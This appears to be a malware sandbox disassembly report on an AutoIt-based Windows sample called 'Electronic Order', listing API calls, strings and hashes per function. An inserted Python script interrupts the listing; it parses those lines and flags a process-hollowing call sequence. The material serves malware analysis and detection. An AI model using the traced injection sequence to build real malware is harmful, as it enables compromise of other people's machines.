                                      • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                      • Instruction Fuzzy Hash: F251DB30A00B85DBDB24BF6AE84056E77A1EF403A8F68832DF865961D4D770DD608B70
                                      APIs
                                        • Part of subcall function 00DC4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DC4F6F
                                      • _free.LIBCMT ref: 00DFE68C
                                      • _free.LIBCMT ref: 00DFE6D3
                                        • Part of subcall function 00DC6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DC6D0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                      • API String ID: 2861923089-1757145024
                                      • Opcode ID: d7489ac2e40f923c47caaa0ea69ddcdab38c2c73134261d6e73af03f784f88b1
                                      • Instruction ID: 31637f956330e1e806d3b515569f29eab6a70672081012d3b4259e9f72538164
                                      • Opcode Fuzzy Hash: d7489ac2e40f923c47caaa0ea69ddcdab38c2c73134261d6e73af03f784f88b1
                                      • Instruction Fuzzy Hash: 3191597191025EAFCF04EFA4D8919EDB7B4FF19314B14846EE915AB2A1DB30E944CBB0
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DC35A1,SwapMouseButtons,00000004,?), ref: 00DC35D4
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00DC35A1,SwapMouseButtons,00000004,?,?,?,?,00DC2754), ref: 00DC35F5
                                      • RegCloseKey.KERNELBASE(00000000,?,?,00DC35A1,SwapMouseButtons,00000004,?,?,?,?,00DC2754), ref: 00DC3617
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: 11e725548e67b5ca645740d2485ca5f1c0a3a17b27becfc0a2be231bde49667e
                                      • Instruction ID: 13e8b7652fc7756b6f2cec7360b5b82b57304de34f5fe608a737b71a625ad726
                                      • Opcode Fuzzy Hash: 11e725548e67b5ca645740d2485ca5f1c0a3a17b27becfc0a2be231bde49667e
                                      • Instruction Fuzzy Hash: 11115775650209BFDB218F65DC80EEEBBB8EF45740F018469F805E7210E272AF459BB0
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01581A5B
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01581AF1
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01581B13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                      • Instruction ID: 51f155ef48d43e5c662fd5781109248d397a954207f22c0de88f449fba4d141c
                                      • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                      • Instruction Fuzzy Hash: 7E620A30A14658DBEB24DFA4C890BDEB772FF58300F1095A9D20DEB290E7759E81CB59
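The CreateProcessW / Wow64GetThreadContext / ReadProcessMemory entry above, together with the CreateFileW entries at 015824FD and 015826E1, is the part of this listing an analyst most wants to read quickly. The script below is an added example and not part of the Joe Sandbox report: it parses API-call lines in the exact format the report prints, decodes the hex arguments into documented Win32 constants (GENERIC_READ, OPEN_EXISTING, MEM_RELEASE, CONTEXT_FULL, HKEY_CURRENT_USER), and flags the ordered CreateProcessW, Wow64GetThreadContext(CONTEXT_FULL), ReadProcessMemory(4 bytes) preamble that the entry shows. The sample lines are copied from this report; the regex, table layout, rule name and function names are the script's own assumptions.

```python
"""Decode hex arguments in Joe Sandbox API-call lines and flag the process-
hollowing preamble. Added example, not part of the report: the sample lines are
copied from the listing, the table and rule names are this script's own."""
import re

# "• Api.MODULE(arg,...), ref: ADDR", optionally prefixed by "Part of subcall function X:".
# LIBCMT entries ("_free.LIBCMT ref: ...") carry no argument list.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Documented Win32 values for the argument positions decoded below.
# "bits" tables are OR-ed flags, "enum" tables are single values.
ARG_TABLES = {
    ("CreateFileW", 1): ("bits", {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}),
    ("CreateFileW", 4): ("enum", {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                                  4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}),
    ("VirtualFree", 2): ("bits", {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}),
    ("Wow64GetThreadContext", 1): ("enum", {0x10007: "CONTEXT_FULL(x86)"}),
    ("RegOpenKeyExW", 0): ("enum", {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}),
}

def parse_arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None                                   # value the sandbox could not resolve
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]{8}", tok) else tok

def parse_listing(text):
    """Return (api, module, args, ref, is_subcall) tuples for every API line in text."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue                                  # headings, hashes, dump-source lines
        raw = m.group("args")
        args = [parse_arg(t) for t in raw.split(",")] if raw is not None else []
        calls.append((m.group("api"), m.group("module"), args,
                      int(m.group("ref"), 16), m.group("sub") is not None))
    return calls

def decode_arg(api, pos, value):
    """Symbolic name(s) for one argument, or the raw value when no table applies."""
    kind, table = ARG_TABLES.get((api, pos), (None, {}))
    if kind is None or not isinstance(value, int):
        return value
    if kind == "enum":
        return table.get(value, value)
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else value

def annotate(call):
    """One call rendered with decoded arguments.
    Caveat: the sandbox prints a raw stack snapshot, so positions can be shifted
    by one (compare the CreateFileW lines at 015824FD and 015826E1 in this report)."""
    api, module, args, ref, _ = call
    shown = ["?" if a is None else str(decode_arg(api, i, a)) for i, a in enumerate(args)]
    return f"{api}.{module}({', '.join(shown)}) @ {ref:08X}"

# Ordered (api, predicate) steps; they must occur in listing order, not necessarily adjacent.
# This report shows only the preamble: create a child, fetch its x86 context, read 4 bytes
# (one 32-bit pointer) from it. Any later writes or thread resume are not on this page.
HOLLOWING_PREAMBLE = [
    ("CreateProcessW", lambda args: True),
    ("Wow64GetThreadContext", lambda args: len(args) > 1 and args[1] == 0x10007),
    ("ReadProcessMemory", lambda args: len(args) > 3 and args[3] == 4),
]

def match_sequence(calls, rule):
    """Return the refs of the matched calls when every step occurs in order, else None."""
    refs, step = [], 0
    for api, _, args, ref, _ in calls:
        want, pred = rule[step]
        if api == want and pred(args):
            refs.append(ref)
            step += 1
            if step == len(rule):
                return refs
    return None

def scan(text):
    calls = parse_listing(text)
    return {"annotated": [annotate(c) for c in calls],
            "hollowing_preamble": match_sequence(calls, HOLLOWING_PREAMBLE)}

# Constructed sample: API lines copied from the function entries in this report.
SAMPLE = r"""
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015824FD
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01582907
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DC35A1,SwapMouseButtons,00000004,?), ref: 00DC35D4
• CreateProcessW.KERNELBASE(?,00000000), ref: 01581A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01581AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01581B13
  • Part of subcall function 015822A0: Sleep.KERNELBASE(000001F4), ref: 015822B1
• _free.LIBCMT ref: 00DFE68C
"""

if __name__ == "__main__":
    result = scan(SAMPLE)
    print("\n".join(result["annotated"]))
    print("hollowing preamble at:", [f"{r:08X}" for r in result["hollowing_preamble"] or []])
```

Run it on a pasted block of API lines and check the decoded flags against the raw line before trusting them: the stack-snapshot shift visible between 015824FD and 015826E1 is exactly the case where positional decoding silently picks the wrong argument.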
                                      APIs
                                        • Part of subcall function 00DC5045: _fseek.LIBCMT ref: 00DC505D
                                        • Part of subcall function 00E299BE: _wcscmp.LIBCMT ref: 00E29AAE
                                        • Part of subcall function 00E299BE: _wcscmp.LIBCMT ref: 00E29AC1
                                      • _free.LIBCMT ref: 00E2992C
                                      • _free.LIBCMT ref: 00E29933
                                      • _free.LIBCMT ref: 00E2999E
                                        • Part of subcall function 00DE2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00DE9C64), ref: 00DE2FA9
                                        • Part of subcall function 00DE2F95: GetLastError.KERNEL32(00000000,?,00DE9C64), ref: 00DE2FBB
                                      • _free.LIBCMT ref: 00E299A6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                      • String ID:
                                      • API String ID: 1552873950-0
                                      • Opcode ID: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                                      • Instruction ID: fe424a7e9c954a8825a2116f5ee48cfda745a03b5e630ecb59a542e419ca2b8d
                                      • Opcode Fuzzy Hash: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                                      • Instruction Fuzzy Hash: 665151B1904258AFDF249F65DC81A9EBBB9EF48310F14049EB609A7241DB715D80CF69
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                      • String ID:
                                      • API String ID: 2782032738-0
                                      • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                      • Instruction ID: 53283956dff9425c9f2d7bca29c4d4f1981475248a35ead35bdad423637f5655
                                      • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                      • Instruction Fuzzy Hash: 584116706007859BDF28EEABC8809AF77A6EF84374B28817DE859D7641D730DD408B74
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: AU3!P/$EA06
                                      • API String ID: 4104443479-182974850
                                      • Opcode ID: e3e4af3ad8b463de0a0703456bdd47e8f84ba950f6447310c6f115d06515a418
                                      • Instruction ID: 6cf09ee932dc615f0e96614ee290d1f606bd3f14af5a7ea3f4f6041d80622325
                                      • Opcode Fuzzy Hash: e3e4af3ad8b463de0a0703456bdd47e8f84ba950f6447310c6f115d06515a418
                                      • Instruction Fuzzy Hash: 1A415C31A0425A5BDF215B649871FBE7FAAEF05300F2D416DFC82DB286C6219D8087B1
                                      APIs
                                      • _memset.LIBCMT ref: 00DFEE62
                                      • GetOpenFileNameW.COMDLG32(?), ref: 00DFEEAC
                                        • Part of subcall function 00DC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC48A1,?,?,00DC37C0,?), ref: 00DC48CE
                                        • Part of subcall function 00DE09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DE09F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Name$Path$FileFullLongOpen_memset
                                      • String ID: X
                                      • API String ID: 3777226403-3081909835
                                      • Opcode ID: fff360b5f46089dc605121758a0ad9ca0383c53a09dc3ebaa10564e4a3167fea
                                      • Instruction ID: 0fd33a572aec8baaf825b9990469d68ebf3c4a0b23be0206603272bd8d7661b3
                                      • Opcode Fuzzy Hash: fff360b5f46089dc605121758a0ad9ca0383c53a09dc3ebaa10564e4a3167fea
                                      • Instruction Fuzzy Hash: 4B21A130A042989BCB159F94C845BEE7BF8DF49300F04805AE508F7242DBB49A898FB1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_memmove
                                      • String ID: EA06
                                      • API String ID: 1988441806-3962188686
                                      • Opcode ID: 9e9de2637f3e2363efe68033b9a3a968ea131003f22360d3fac43715dfa28d32
                                      • Instruction ID: 6642ad9085289a449b372e43c7a5f2d62253e301dd305f7576722d228585fde4
                                      • Opcode Fuzzy Hash: 9e9de2637f3e2363efe68033b9a3a968ea131003f22360d3fac43715dfa28d32
                                      • Instruction Fuzzy Hash: 2D01F9729042586EDB28D6A9D856EEE7BF8DB01305F00419AF552D2181E575A6048770
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00E29B82
                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E29B99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: b305d3f0af124bfeaf81f7cff7809e9a609c098657fb63de9f3ea9562f2bbf7d
                                      • Instruction ID: 8129b7586cbbe53b93cfb2a7e4ec1bed585cb38c0e59f1a7350a2b6d8e865f4c
                                      • Opcode Fuzzy Hash: b305d3f0af124bfeaf81f7cff7809e9a609c098657fb63de9f3ea9562f2bbf7d
                                      • Instruction Fuzzy Hash: 00D05E7954030DAFDB109B91DC0EF9A772CE704B01F0042B1FE64A10A1EEF155998B95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2d12f12678d7ad772ba94ffd0c3d544bd885d6fb5d04bdfee2085f3d77434851
                                      • Instruction ID: fdeaaa882d4ca2d2f832aeebe9af9fc35a653a4c5fed7bed62c3007c0927ef37
                                      • Opcode Fuzzy Hash: 2d12f12678d7ad772ba94ffd0c3d544bd885d6fb5d04bdfee2085f3d77434851
                                      • Instruction Fuzzy Hash: 55F15870A083019FC714DF28D884A6ABBE5FF88314F14992EF899AB351D731E945CF92
                                      APIs
                                      • __FF_MSGBANNER.LIBCMT ref: 00DE5963
                                        • Part of subcall function 00DEA3AB: __NMSG_WRITE.LIBCMT ref: 00DEA3D2
                                        • Part of subcall function 00DEA3AB: __NMSG_WRITE.LIBCMT ref: 00DEA3DC
                                      • __NMSG_WRITE.LIBCMT ref: 00DE596A
                                        • Part of subcall function 00DEA408: GetModuleFileNameW.KERNEL32(00000000,00E843BA,00000104,?,00000001,00000000), ref: 00DEA49A
                                        • Part of subcall function 00DEA408: ___crtMessageBoxW.LIBCMT ref: 00DEA548
                                        • Part of subcall function 00DE32DF: ___crtCorExitProcess.LIBCMT ref: 00DE32E5
                                        • Part of subcall function 00DE32DF: ExitProcess.KERNEL32 ref: 00DE32EE
                                        • Part of subcall function 00DE8D68: __getptd_noexit.LIBCMT ref: 00DE8D68
                                      • RtlAllocateHeap.NTDLL(01590000,00000000,00000001,00000000,?,?,?,00DE1013,?), ref: 00DE598F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                      • String ID:
                                      • API String ID: 1372826849-0
                                      • Opcode ID: 7a619b0b1350988842e9699db26ae33d84ec776f3dba2e8774a0bd2d319dcf56
                                      • Instruction ID: 748cce2f8ee7d01d4a19d096bb1b14108deae91512b9bfbf35af5d8fdca843b7
                                      • Opcode Fuzzy Hash: 7a619b0b1350988842e9699db26ae33d84ec776f3dba2e8774a0bd2d319dcf56
                                      • Instruction Fuzzy Hash: 2401F931201B92DED6117767FC417AD7248CF417B8F540026F405AB2D2DE709D015B75
                                      APIs
                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E297D2,?,?,?,?,?,00000004), ref: 00E29B45
                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E297D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E29B5B
                                      • CloseHandle.KERNEL32(00000000,?,00E297D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E29B62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleTime
                                      • String ID:
                                      • API String ID: 3397143404-0
                                      • Opcode ID: 1a186793708bf9a79ffd08048c620ba3b4e1698196b96c69311a0b154e18349f
                                      • Instruction ID: 5fe8fac9e3851719af92764ff264a4c686a4ec9f01748178fcbba85e0d028d31
                                      • Opcode Fuzzy Hash: 1a186793708bf9a79ffd08048c620ba3b4e1698196b96c69311a0b154e18349f
                                      • Instruction Fuzzy Hash: 2DE08636181224BBDB211F55EC09FCA7B58AB06F65F104220FB54791E187B125169798
                                      APIs
                                      • _free.LIBCMT ref: 00E28FA5
                                        • Part of subcall function 00DE2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00DE9C64), ref: 00DE2FA9
                                        • Part of subcall function 00DE2F95: GetLastError.KERNEL32(00000000,?,00DE9C64), ref: 00DE2FBB
                                      • _free.LIBCMT ref: 00E28FB6
                                      • _free.LIBCMT ref: 00E28FC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
                                      • Instruction ID: 9d7b3b71113e7af3179a3c923e6a66787b7d99f1bbc61beb22d8bf5a3029c993
                                      • Opcode Fuzzy Hash: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
                                      • Instruction Fuzzy Hash: 1EE012B170A7554AEA24B6BABF40AA357EE9F48355718181DB40DEB142DE24E8418134
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CALL
                                      • API String ID: 0-4196123274
                                      • Opcode ID: bb6f918ac35deea30609d94a2265702a08befc3d05513a42037dd6a1a1283916
                                      • Instruction ID: 93e6369a5bf7cce5bebc5b994b2175c1382703253ce437af5616d55c701f585e
                                      • Opcode Fuzzy Hash: bb6f918ac35deea30609d94a2265702a08befc3d05513a42037dd6a1a1283916
                                      • Instruction Fuzzy Hash: 93223674608246CFC724DF18C495F6ABBE1FF44304F19895DE89A9B262D731EC85CBA2
                                      APIs
                                      • IsThemeActive.UXTHEME ref: 00DC4992
                                        • Part of subcall function 00DE35AC: __lock.LIBCMT ref: 00DE35B2
                                        • Part of subcall function 00DE35AC: DecodePointer.KERNEL32(00000001,?,00DC49A7,00E181BC), ref: 00DE35BE
                                        • Part of subcall function 00DE35AC: EncodePointer.KERNEL32(?,?,00DC49A7,00E181BC), ref: 00DE35C9
                                        • Part of subcall function 00DC4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DC4A73
                                        • Part of subcall function 00DC4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DC4A88
                                        • Part of subcall function 00DC3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DC3B7A
                                        • Part of subcall function 00DC3B4C: IsDebuggerPresent.KERNEL32 ref: 00DC3B8C
                                        • Part of subcall function 00DC3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E862F8,00E862E0,?,?), ref: 00DC3BFD
                                        • Part of subcall function 00DC3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00DC3C81
